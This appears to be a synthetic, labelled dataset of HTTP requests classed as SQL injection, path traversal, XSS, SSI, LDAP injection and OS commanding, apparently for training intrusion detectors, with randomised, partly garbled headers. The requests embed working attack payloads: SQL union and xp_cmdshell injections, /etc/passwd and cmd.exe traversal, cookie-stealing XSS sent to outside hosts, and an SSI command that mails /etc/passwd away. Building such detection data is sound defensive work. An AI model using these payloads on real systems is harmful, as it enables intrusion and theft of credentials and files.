Content-Location: /aNhrme/liebprc.conf
Content-MD5: aXNyaUxvcnIyb2VFcmlpeg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 29 Apr 08 12:53:58 UTC
Last-Modified: Fri, 30 Mar 07 02:02:36 CET
Host: www.dN2ha.be
Connection: close
Accept: audio/*;q=0.6, text/*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 240.130.115.181
Cookie: arm@%un3uQNk=8;xpmatpkaemOtl=naG7M;eR=rrt%7E%25sata0n4ei
Cookie2: $Version="49"
Date: Fri, 10 Aug 07 16:38:27 GMT
ETag: W/"MMz6nJo0JmIGI1uG"
Expect: 100-continue
From: thGyc@rjbnmtcw.gov
If-Modified-Since: Sun, 11 Jan 09 01:35:42 GMT
If-Unmodified-Since: Thu, 18 Dec 08 03:12:17 GMT
If-Match: "RYR8tqjummLZhkCufZD"
If-None-Match: *
If-Range: *
Max-Forwards: 251
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM bTRhZWRxbDBkaWhlcmFydXJtSGVvMWN0cHJlZWNuZG1lamVsbw==
Authorization: tdzb to2mOt=teiOOsx
Range: 90513-
Referer: /isoiwbqs/Yrehe/Ukvnssl.cgi
TE: chunked,gzip;q=0.3,deflate
Trailer: Transfer-Encoding
User-Agent: eiwtIio (yK_Z8HFmP5; jiYHyMk3; aUQxUM; lG-R@BBqz)
UA-CPU: MIPS
UA-Disp: 533,555,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 940x1719
Via: 5.2 112.123.85.248, mgwt/6.4 95.22.0.37, FTP/5.7 www.diyrcnt.tiff:6
Transfer-Encoding: nzeeet; iI7k=eyu8teiu
Upgrade: 9aoe/3.6, dao/3.0, ucnVit/7.1, erAr/4.2
Warning: 819 www.ttnhr.shtml "rog8prr93m" "Wed, 03 Mar 04 11:36:52 UTC"
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 3901331377594
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

oTqniO=86735&0hglshiIrgttNTc=22892002&GT78k=718)(&(objectClass=tuer)(|(sn  =rt0s)(cn=mhch   J*))&jt=8808134832&u6hssitntd=eeoaGod$oih&5R00=t1gpeb3s&hhOns4HusEebt=ytacqtmp&dautoexecB.ZK36ZO5Y=747908&9os=QTncnitEerobyrKoe&m8=we')nt(i%uautoexecn&ys6atoorrtoo=293&5z1hnK=089

End - Id: 37695
Start - Id: 41241
class: SqlInjection
GET /ye4Pdee/shutdownK/fytrccris9oim5/NaQvbscriptLPkyLmU7B./26RJtmpy8L7.WJB/dzmailR-Qdocument_@8.selectm.png?rfmaEDta=isdlacyN5ctteh&itef6dTguefie3=gmm_jIm HTTP/1.0
Host: 48.174.192.173
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.4, gzip;q=0.3, gzip
Accept-Language: '     union   select @@version,1,1,1--
Cache-Control: only-if-cached
Client-ip: 137.5.183.29
Cookie2: $Version="2"
Date: Sat, 01 Aug 09 03:24:53 UTC
ETag: W/"P9Niq6_s0DQ2KH.n-Hv"
Expect: auPvos
If-Modified-Since: Fri, 26 May 06 13:55:29 CET
If-Unmodified-Since: Fri, 17 Jun 05 15:46:05 GMT
If-Match: "qCjVLWYZH5IDLYv"
If-None-Match: "VpPG3EnI8skUU4Z5cDCP"
If-Range: Tue, 26 Feb 08 01:40:53 CET
Max-Forwards: 1
MIME-Version: 4.6
Authorization: NTLM YXJ3ZWRoMGVDd0FoT251MG5ydGxoYmV0bGoxZUVlUmRuN29laQ==
Referer: http://www.llqe.net/neou.avi
User-Agent: 5ooVsnmTch/8.8.2.8
UA-CPU: 68000
UA-Disp: 9585,9750,32
UA-OS: Linux
Via: 9.8 215.202.233.161
Transfer-Encoding: identity
Upgrade: nI4c/2.6
X-Forwarded-For: 248.13.251.126
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41241
Start - Id: 36356
class: PathTransversal
GET /d_/mYj/vsiroeehtt/kYidwGhXHTT-t4PK3E/ueEea5r34cirlxeE/seZwjXI.dll?eiiewO=%2Fetc%2Fpasswd&imzeijd=cCUFPdB&IiteigehiQ0l=t2I+n%40&wenmda=7535716&etwt3ekf=41484 HTTP/1.0
Host: www.garhe.gov:80
Connection: keep-alive
Accept: application/*;q=0.6, text/*;q=0.6, application/x-tar
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.8, gzip;q=0.8
Accept-Language: *
Cache-Control: no-cache
Client-ip: 150.79.127.140
Cookie: yiwNnE4awaeiET=boot.ini1eg;efSaxi7lthslSn=1941;ljiokomosr=lehw2wfAas10ytin;dnml=allMuexech<>-~i9ycHehEi;ZfsOiDaosO=63030893;hewtdatpni4e=iaennrxe:2
Cookie2: $Version="14"
Date: Wed, 07 Sep 05 13:59:19 CET
ETag: W/"FVdxZvFAz4j68bNZ95W0"
Expect: eatl
From: sotSFlSe@qiksat.biz
If-Modified-Since: Fri, 08 Jan 10 02:03:48 UTC
If-Unmodified-Since: Sun, 02 Mar 08 05:20:53 GMT
If-Match: "ZZKNmk7E5@hKVdxm"
If-None-Match: *
If-Range: "cB1oQ@yo3ygkubrCeISc"
Max-Forwards: 7117
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Basic YXVJbnM6ZWhpcjFndHU=
Authorization: Basic eHNkZWR1Ymk6Y3RhUg==
Range: 75-618834,757-411,77394-267269
Referer: /rkehaEd/iasu/snuEIob/dhneyasm/ataslr.sh
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/0.5 (compatible; Konqueror/5.6; Win98; nothIorKtg; ltet; oihq)
UA-CPU: MIPS
UA-Disp: 7628,9010,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 636x8824
Via: HTTP/9.8 www.xjod6ef5.gif:0461
Transfer-Encoding: gzip
Upgrade: T8m/5.2, fg1ie/5.0, hrhh/0.4
Warning: 752 195.16.67.206 "ehmsasmiiyniOokn" 
X-Forwarded-For: 217.52.49.74
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36356
Start - Id: 40992
class: SqlInjection
GET /hKz4Y0pfBra.5_E8.lfI.swf?fxhnloanms=2&aota5ldze=enms&HX9fofr=cqvoast0owta%2Bdboot.inir&ubrtoetpz7e=ds&jmHH_0.DPnetcatE=87358714&dtOa=pw%3Bs%3D&ooetomc=rzHexec%26&inhedldatmmecni=021239125&P2_BD4k6FR=aDG9MWuz&sntcsyhlttgppd=95&j97S8wWKconnect=neYhs&kY9=adtc3idvdrop+n&elenre=7838454 HTTP/1.1
Host: www.rati6e.be
Connection: close
Accept: application/zip
Accept-Charset: iso-10646-ucs-2, shift_jis;q=0.1, gb2312
Accept-Encoding: 
Accept-Language: lb-oasaay, 1r6E-daeyj4yi, ddwimhd-so
Cookie: wtlE=9;DixN22vhtaccesBG11=uelsrslshg2dofryee;ebfp=';EXEC   master.dbo.xp_cmdshell    'cmd.exe;Ryild=ctfcot;VnCAAC2VCS=e9CRT
Date: Thu, 22 Mar 07 02:46:45 CET
ETag: "y8@gaovYo.A8Ws-MB"
If-Modified-Since: Tue, 12 Feb 08 14:43:01 UTC
Max-Forwards: 2
Pragma: no-cache
Referer: http://oIo4eeoa.fr/rte0tmnr/rhe2nait/toei/oami.zip
User-Agent: q7Vsiaetrp/0.7.1.0.3
Upgrade: r3r/4.4, ei6l6/2.6, cm9n/1.5, oemk/7.0, pnhe/6.7

null

End - Id: 40992
Start - Id: 35947
class: PathTransversal
GET /nr6pnaNtlhz5flaChs0/7I5eWpassthru_aPkVY_7bin/a9GLTS7djtGWy/wd9a/oetdsxhmaytauFai/ihhvMZzG/h29s9i2xxtadptu.pl?4iZ@Ksu@0htpassc=mg+%7Ce%7E+g9Aadminutexecgroup+bym1hse&vc=838257737&-EphpkY=1207174&uaras3pDwjynl=581228&vor3oaeregJm=5&wsBqSandy=mvq.w_RA7V&putesnItN=eehbgsoundomf%29rt&tg3dwhopMja=%3C%21--%23include++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22++++--%3E&ml=t%40bOXNK HTTP/1.0
Host: www.uh1u.cz:1897
Connection: rnad
Accept: application/*;q=0.8, application/*, audio/basic;q=0.3
Accept-Charset: *
Accept-Encoding: deflate, deflate
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 51.18.212.153
Cookie: imdfaoebM0myrmo=eKwISHXp;aS=wpu3tE;dnee3eicntbRsl6= logUut;eZvDVZvClI==e&d systemn6tlensaccess_logtelnet;Lnas=4
Cookie2: $Version="31"
Date: Mon, 22 Mar 04 07:21:41 GMT
ETag: W/"I1k9LjH86E57ta@Yak-E"
Expect: 100-continue
From: VhEec8@alpudeo.biz
If-Modified-Since: Mon, 12 Jan 04 23:55:38 CET
If-Match: "UTNOgJvF8qFsyXz8Dyu"
If-Range: *
Max-Forwards: 3316
Referer: http://www.nnbtn.it/hdune/earth8tF/hne1med/tjltw.fgf
TE: gzip;q=0.7
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.1 (Windows; U; Windows NT 6.3; rf-nt; rv:4.4.2) Gecko/19471784
UA-Pixels: 612x0492
Via: 6.0 www.lreld.tiff, HTTP/2.4 199.48.62.246, FTP/5.1 206.52.31.118
Transfer-Encoding: compress
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35947
Start - Id: 47135
class: XSS
GET /okmwKP_2r/pgtpdd/ci8hovuu2srdhgl/nynsincsaeosndatt/e88b@7HI/uVGG_tZ3WwdtdFzz/MpLXCMe/uez8togheneol5vcetdd.asmx?EhhGenLar3kb=ieqAeaouaefshhsWt&3oedadri=Txe3ra&n6mLo=01583259&gmcq_P0CCm=gtOe2erSoho3s1&negifzpb0aLrehh=%3Cimg+src++%3D+%22+setaneni+%22onmouseover+%3D%22%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.na.com%2Fcgi-bin%2Fonri.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22++%3E&Pqphphz=m1NreizyXp5frmnre&saTioEce=1909850 HTTP/1.1
Host: www.paoemh.be:80
Connection: AeBh
Accept: video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 42.224.13.5
Cookie: thaa4vt7t7Olt=G=vb
Cookie2: $Version="63"
Date: Thu, 01 Nov 07 07:31:33 CET
ETag: "LcSIlirSRVReo07k6"
Expect: dwai6Nt=atnc48
From: SntgwR@dDthvRF0b.it
If-Modified-Since: Tue, 07 Dec 04 02:13:31 CET
If-Unmodified-Since: Fri, 25 Apr 08 02:49:02 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 29 Apr 10 13:06:36 UTC
Max-Forwards: 45
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM aXU0YnduSWdoNzllTHA2dzdoNGhvYmlxbFNzbm5oZWNhYWZoN2lzbmVF
Range: -63707,310050-133
Referer: /ZciWU2/cEtGo/nmteatj/necfkttv.mdb
TE: trailers
Trailer: TE
User-Agent: HEeati/1.8.8.7.1
UA-CPU: 68000
UA-Disp: 9389,112,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 673x645
Via: FTP/0.4 www.3eoDfHei.html
Transfer-Encoding: identity
Upgrade: eixwry/2.2, nei/4.2, gHU/2.1
Warning: 339 51.64.209.7 "6Kirtt2tetFxoo" "Fri, 17 Oct 08 02:00:42 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 42655
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47135
Start - Id: 42007
class: SqlInjection
GET /rM7G/u@LMYinsh8@FL7UfIlwC/M73xBD/ojRoKYp/gURar_5d4zYpf6eWL2k/iSCP/v9tfRO/i-A3sI9vDRwKz2U6O.tiff?2bcapk3n=chee&ejgieedtyrxtleb=Wro1&J1_ZqQCpd=eree0t&ahzeanoubttT=8757397412&FZc6NIx=dUSKZbgG&el55gktd1eyy9r=%27+++%2F**%2F++++OR+++++%2F**%2F%27%27%3D+++%27&e5wqt=u HTTP/1.1
Host: 138.229.214.5
Connection: keep-alive
Accept: application/*
Accept-Charset: *;q=0.0
Accept-Encoding: gzip, identity;q=0.4, gzip;q=0.4
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 11.178.28.161
Cookie: nsseltyattaie9o=33585;OETffeIyO=eepasswd;V@9bgsoundh57h8dre=503999
Cookie2: $Version="53"
Date: Tue, 24 Mar 09 03:38:12 GMT
ETag: "B3glT-8JF-SL@BPzG.S"
Expect: 100-continue
From: etDdz@s1Ttlneied.ch
If-Modified-Since: Mon, 10 May 04 09:45:21 UTC
If-Unmodified-Since: Sat, 12 Aug 06 09:45:45 CET
If-Match: "i@m@QaTeCTsY8H8GiLIo"
If-None-Match: *
If-Range: Thu, 13 Aug 09 09:08:32 GMT
Max-Forwards: 0
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest uri=/oyooyi/aelsuo1/iteo/eu7usa/EDiri.cfm
Authorization: Digest opaque="4venij"
Range: -2,-9858,-988607
Referer: /e71tu5fp.fgf
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/0.5 (Machintosh; U; PPC Mac OS X 4.8; Oh-ce; rv:6.5.5) Gecko/54140774
UA-CPU: StrongARM
UA-Disp: 442,012,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 0057x268
Via: 6.5 www.eztenomo.js, 9.3 www.eemt.css, HTTP/6.3 234.176.233.231:9350
Transfer-Encoding: gzip
Upgrade: efau/6.6
Warning: 117 www.dpoc.html "usfeuteterl01" 
X-Forwarded-For: 242.20.82.168
X-Serial-Number: 063116688396663
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 42007
Start - Id: 39345
class: SSI
GET /jodieOtLuTnriB/y.pC2v/eF-hS7Lgd55oM/eIalTaaUguNzpis0xtd/hoRrilnal4dr/wJ0QCLbcduFP3TiGm/sDEhocwFW65_Dw/bnmvnyo.png?lt=065246&oeswE=aG8Xx-Mo-&3ume0lmi2hcASfn=6fax3re&oZgptgeyda=%3Be%40H5&n2eya=xjdyebduemondh&omWneqo0es=%3C%21--%23email+fromhost%3D%22www.ScueLat.com%22+tohost%3D%22mailbox.azn.com%22+message%3D%22kitn+nhTotge+wbW+nmgr%22+fromaddress%3D%22oolut.com%22+toaddress%3D%22afrur.iLen.com%22+subject%3D%22ze%22+sender%3D%22gl.com%22+replyto%3D%22jntun.com%22+cc%3D%22aisr%22+inreplyto%3D%22eci+5aB+or%22+id%3D%22kesmail%22+--%3E&LGRxX5=em&t1ao=r6s&2e=hiei&aHtsnh=ogodudUinsE&g1inE5peL=9014&Uoeilo=wvrT%25it&onhbCenoiecepnl=sie&anz0s8tidnss=n HTTP/1.1
Host: 199.104.230.219
Connection: keep-alive
Accept: image/jpeg;q=0.0, audio/*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: i-itrl;q=0.4, awkr-baolwdf
Cache-Control: min-fresh=0342
Client-ip: 199.161.172.175
Cookie: fttSd6eaal4shd=11;nwah=homehtyaccess_log;63nt=eall|votrTl;nhrQRsxsgnricT=8223;oee5irfio48booa=csat?9e
Cookie2: $Version="74"
Date: Sat, 11 Feb 06 23:38:36 CET
ETag: W/"2pmeGZhNRIpjk2SWKzJ"
Expect: 100-continue
From: ztifisTh@itMb.uk
If-Modified-Since: Mon, 13 Oct 08 21:43:56 CET
If-Unmodified-Since: Tue, 28 Oct 08 13:24:25 CET
If-Match: "-aUfKaKEi7JU9073kL."
If-None-Match: *
If-Range: Fri, 08 Dec 06 12:30:55 GMT
Max-Forwards: 7075
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM dDF5cXlCY2FlcnMwZ3RveXJlbHQ4b0Vhc1R5cmhvaGFvaGU4c2Q=
Authorization: Basic c2FJYmV5OmV3dGZiNA==
Range: 80-3,5062-096637
Referer: http://www.t4le9e6m.gov/wtnug/tAnttenp/5wshh6ss.asp
TE: trailers,deflate;q=0.9,trailers
Trailer: Expect
User-Agent: Mozilla/1.2 (Windows; U; Windows NT 1.2; po-cr; rv:3.3.6) Gecko/30479596
UA-CPU: 68000
UA-Disp: 879,3811,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5277x2991
Via: pol1et/3.2 208.247.58.3, tgeld/5.6 26.150.182.93:087
Transfer-Encoding: 6m4f; thuaijt=aeYeat
Upgrade: 5lnxa/4.9, sonsya/6.3
Warning: 330 59.99.71.16 "lsngqsttrt0oajgUtrih" "Mon, 05 Mar 07 23:21:49 CET"
X-Forwarded-For: 29.96.81.249
X-Serial-Number: 802337450581
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39345
Start - Id: 42156
class: SqlInjection
GET /ezZP9sgyYc15.tN/aGetazoqcQgf/2i0Tl./C4T/aiatrehaTa/g5WUAT9BaPF4t3V6re/pFhtacces/BUtmpP.CEaccess_logf0netcat/ao.tiff?_C@5gechob2fXhQ=frmL-dFPtij&rsellOsnoa=awhel8%5Da%29+cfr&IN5XAsysteml0bodyQ=er6Q&Er5TSZKs8V=h+csuiai&uisuA3=chairs%27+UNION+SELECT+++anlrijme++++FROM+dba_users+++WHERE+++name+++++like+++%27%2525&QwmrLmax9zx=egehIUa2_QI&wmuwooersecsma=2301705&aetl=ey%40+&chza6AucvosT=yWOgmohhr%24nph-OJ%7Ef9me&94msEt4ghs1ey=6421444&Wte6fjwIoaM=E%7Cdm&thuoh=iOLoreaes&GVfmEjwherecnperlq=tnkbgj9KveeHI HTTP/1.1
Host: www.pdtyeelt.st
Connection: thuds
Accept: */*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: saemtbs-efc;q=0.4, mosnnd-troey, eu-ptmhcbu
Cache-Control: max-stale
Client-ip: 117.221.83.105
Cookie: 0zeraeDineaovs=u2o;8remena=ntbw5oeeergqoben;kinCTsael2sir1j=51916407;s1an=ae;anbniissfRgHn=sdeyDEuzrhnl2yo;ae1eo=mPIX6xarZ@s
Cookie2: $Version="18"
Date: Fri, 09 May 08 06:16:35 GMT
ETag: W/"q9@-@42oTbHORdulE04"
Expect: aho2Bm=aetsd4di;yyd5s
From: tktabU@4ahlq0ig.org
If-Modified-Since: Mon, 23 Mar 09 06:32:03 UTC
If-Unmodified-Since: Mon, 28 Aug 06 18:14:01 UTC
If-Match: "WC_sA9U12wVxJI9ag"
If-None-Match: *
If-Range: *
Max-Forwards: 7633
MIME-Version: 0.7
Pragma: 9Onfeeg='T'
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Basic ZWhhYTptY2FubGts
Range: 4781-
Referer: /netajcoj/Abbeea/4uSANO/ieece.msf
TE: deflate,trailers
Trailer: Expect
User-Agent: Mozilla/3.9 (compatible; MSIE 5.3; Win98; klsesomutn)
UA-CPU: StrongARM
UA-Disp: 2259,521,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3499x504
Via: 4.5 www.homphXe.html, HTTP/5.2 www.oanEato.htm:7
Transfer-Encoding: ktfi
Upgrade: cosqd/4.3
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42156
Start - Id: 39079
class: LdapInjection
PUT /Se7t/acceptaGdropiR8q1aMsamMn/txU/tSio@zrbUJc_@@x7xv3d.html? HTTP/1.0
Content-Length: 11
Content-Language: a7gc,wabye
Content-Encoding: gzip
Content-Location: http://Otcj6e.uk/rpldm/nGena.png
Content-MD5: c25lNmNsZWd1ckVmc21mZA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 May 04 08:37:03 CET
Last-Modified: Mon, 19 Jul 04 01:49:46 UTC
Host: 180.230.74.153
Connection: c2nvstuu
Accept: */*
Accept-Charset: utf-8, x-mac-hebrew
Accept-Encoding: 
Accept-Language: ii-reysum;q=0.0, hse-sesuTxt;q=0.5, Es-hte;q=0.2, pB-c;q=0.5
Cache-Control: max-stale
Client-ip: 12.140.126.209
Cookie: nb=em;0QreYvGMkHFL=) (   |   (eh=ag*);nabteerthrlri= oaiabZ  e>inpute-e1rac;1aecn=4;cNurn=sa g;apteccerarhxct=mm7
Cookie2: $Version="9"
Date: Fri, 18 Dec 09 07:32:53 CET
ETag: W/"U6yGTH1hp58Ykl0W"
Expect: 100-continue
From: hhsos2Jt@Dpotzngl.gov
If-Modified-Since: Sun, 14 Dec 08 22:27:59 GMT
If-Unmodified-Since: Thu, 04 Feb 10 17:59:38 CET
If-Match: *
If-None-Match: "eWGL948@f0pJ0Gr0P"
If-Range: *
Max-Forwards: 34
MIME-Version: 1.2
Pragma: aTm67zn='0Ibbe'
Authorization: tedt Jwrg=EfT8
Referer: http://lej7f.uk/drdea2/rp3d/s3unr/cire.doc
TE: trailers
User-Agent: 0oGndsx5e
UA-Color: color16
UA-Pixels: 9422x4154
Via: myee/7.6 www.otqngact.tiff
Transfer-Encoding: l3de; bhrsRte=qbtl5sLt
Upgrade: rishh/8.4, OnisdI/5.4, Tcuko/3.4, opdaet/0.0
Warning: 529 www.iaEnlc.shtml "HhusNdbemwiiMof7rg" 
X-Forwarded-For: 22.168.245.53
X-Serial-Number: 89933441893
----: ----------------
~~~~~: ~~~~~~~~~~

5tqle=30283

End - Id: 39079
Start - Id: 37702
class: LdapInjection
POST /nNl2DowtZylxqKebhdab/r0_IDU/ize0aidfnot/dT33rBKOLMRbzv/oXCZKG4psT2/YUPYSpiN8Tcatc.nsf? HTTP/1.1
Content-Length: 166
Content-Language: gGqadn,usre,b
Content-Encoding: identity
Content-Location: http://sutea.biz/dasat.gif
Content-MD5: dWVhNUJycmVvYWplbGV0SA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 02 Nov 08 03:24:45 GMT
Last-Modified: Mon, 03 Jan 05 05:56:02 GMT
Host: 227.171.147.243
Connection: keep-alive
Accept: text/*, video/*;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: deflate;q=0.3, compress;q=0.5, gzip
Accept-Language: Iaeekto-q;q=0.3, u6le4R-DdiSaid8;q=0.4, h-tskateb, tsm-e;q=0.9, srleremn-eg
Cache-Control: no-cache
Client-ip: 237.81.61.20
Cookie: arm@%un3uQNk=8;xpmatpkaemOtl=naG7M;eR=rrt%7E%25sata0n4ei
Cookie2: $Version="98"
Date: Fri, 20 Jun 08 13:01:50 UTC
ETag: "n4cBYNpmLWIikXUq4-kH"
Expect: 100-continue
From: nRYbeaTm@ivguoee.org
If-Modified-Since: Sun, 30 May 04 15:26:48 UTC
If-Unmodified-Since: Thu, 18 Dec 08 03:12:17 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 25 Mar 10 24:21:35 GMT
Max-Forwards: 36
MIME-Version: 4.9
Pragma: R='cetrecei'
Proxy-Authorization: NTLM bTRhZWRxbDBkaWhlcmFydXJtSGVvMWN0cHJlZWNuZG1lamVsbw==
Authorization: tdzb to2mOt=teiOOsx
Range: 90513-
Referer: /9aes0/Tkw2/teozenmu/Ogdw.php3
TE: chunked,gzip
Trailer: Range
User-Agent: Mozilla/1.7 (Windows; U; Win 9x 1.9; sn-9n; rv:3.2.5) Gecko/85757012
UA-CPU: MIPS
UA-Disp: 0739,408,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 940x1719
Via: 2.1 14.91.240.203
Transfer-Encoding: compress
Upgrade: oia/6.0, uNfl/8.0, net/8.9, ai8/5.6
Warning: 819 www.ttnhr.shtml "rog8prr93m" "Wed, 03 Mar 04 11:36:52 UTC"
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 3901331377594
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Rrkqdoehdned=snae&U2having2RVxY=l9&nGpwnezr=zIestieoekeir2nArS&inputMri=08oG.U&likerr4rincludev6kK=67&vmu3ixmg1iauytl=)    (    |    (brcOe=aolE*)&EreF=bn

End - Id: 37702
Start - Id: 44469
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 133.144.215.253:80
Connection: keep-alive
Accept: audio/x-wav;q=0.9, image/png, image/jpeg
Accept-Charset: *
Accept-Encoding: deflate;q=0.6, deflate
Accept-Language: *;q=0.8
Cache-Control: min-fresh=6358
Client-ip: 1.111.16.222
Cookie: sasni=0;2gCbr1niisf=cEGXIc4;dndDieyehnPey=fbssteNrxtermAiet;qr.passwdLFR=olecsAgsetraiy;rhst=386658
Cookie2: $Version="32"
Date: Sun, 22 Mar 09 04:28:39 CET
ETag: "9tG0dVXV9Y0RyLYk3AXZ"
Expect: 100-continue
From: bniw@mamjmaT.net
If-Modified-Since: Wed, 01 Dec 04 09:54:12 UTC
If-Unmodified-Since: Thu, 28 Oct 04 01:11:51 CET
If-Match: *
If-None-Match: "@0agL0twbZzBoki6N88p"
If-Range: Mon, 09 Nov 09 19:43:14 CET
Max-Forwards: 2
MIME-Version: 3.4
Pragma: eaeza=nineabru
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: Basic cjNydDpzeHZlYXdzcQ==
Range: 6-02287,72753-
Referer: /oxlnid1Z/ejpus/rAr8/gxsmlbc.cgi
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/4.4 (X11; U; SunOS sun4u 6.4; ko-ni; rv:8.7.6) Gecko/17035472
UA-CPU: Sparc
UA-Disp: 4598,6084,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 448x826
Via: HTTP/7.0 229.21.102.43, o1lt8A/8.7 www.R9sre.jpg, 5.4 www.aviaki.js:75
Transfer-Encoding: gzip
Upgrade: w6oe9u/5.4, aaho/3.9, gis/1.8, eea/6.5
Warning: 501 www.cprtyoh.shtml "dxglmsBysiDotehi5yhe" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 73463
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44469
Start - Id: 47807
class: XSS
GET /46Z.g/s4grKFN.Tq7/ckQ/an8e5/RczEYmservicess/liiozgzosdwgg.mdb?xaile=2537778&lsVDZWUitaw9=0437878&jEcr9BtHnee=rs3f-&Ftmcsw6pmtt6osa=gntlM&Bba0Z=et&ahsrrasn=%3Cimg+++src++%3D++%22+++++mocha%3A%5Bwindow.open%28%27http%3A%2F%2F142.232.134.230%2Fnaic.cfm%27%2Bdocument.cookie%29%3B%5D+++++%22%3E&albedg=lcua9raoa&t0nnoaent=858458&6OadQQ=s+11n HTTP/1.0
Host: www.x0wnitntiv.gov:80
Connection: keep-alive
Accept: video/mpeg, text/*;q=0.9, audio/*
Accept-Charset: iso-8859-5;q=0.0, us-ascii;q=0.2
Accept-Encoding: *;q=0.1
Accept-Language: ty0seo-oN, mrexty-gcnasn;q=0.8, PysoItA-sgh, s45nrg-pxWm
Cache-Control: no-cache
Client-ip: 203.27.77.55
Cookie: bioe0stk=6148;sed4aefS8=fC7LlV@58;5kse=hr2ec17Uk5d4;5dn9ntIitrsoe=c
Cookie2: $Version="20"
Date: Fri, 04 May 07 14:08:27 CET
ETag: W/"NIPiNBIpDeDPeGkY13"
Expect: 100-continue
From: shnba@roottg.it
If-Modified-Since: Tue, 24 Jun 08 20:35:08 UTC
If-Unmodified-Since: Sun, 29 Jan 06 08:00:02 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 01 May 09 14:41:21 GMT
Max-Forwards: 6454
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest username="oaid"
Authorization: Digest opaque="e8ts9it"
Range: 2820-37,-5180,81-
Referer: /tt7ua/4spypAqo/e12lenpa/e4ics/uyetn.asp
TE: trailers,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/2.4 (X11; U; Solaris 3.7; tq-ek; rv:4.8.1) Gecko/13979094
UA-CPU: MIPS
UA-Disp: 191,879,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 9392x482
Via: HTTP/0.5 7.11.105.199, 3.3 247.22.173.87
Transfer-Encoding: gzip
Upgrade: thgmp/3.3, cwanec/6.4
Warning: 315 223.24.177.34 "gnbpnesajImnUauppEa" "Thu, 03 Jun 04 13:41:49 GMT"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 14491
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47807
Start - Id: 40069
class: SSI
GET /ioRifttE8t/s-JF7/t-3B2_BlR_RE.a2wU/a2o.htm?u8ndrOa3=i9VNql13Hp9C&dsltl=e&ytNGSOry81anM=c&-ncKrmc=yiWiDoc1wfiAnu&V9iTI05=pa&HPfhL-6@=wbnR4eutie&snltfaec4ni=%3C%21--+%23exec++++cmd%3D%22%2Fbin%2Fmail+aUl1Eyo.com+++%3C+++%2Fetc%2Fpasswd%22--%3E&71ek=zNca%26ic%5Dd%2Fia+%2Fc&eaekh8roHt=lexIJ.a HTTP/1.1
Host: 233.180.133.19
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 159.72.147.40
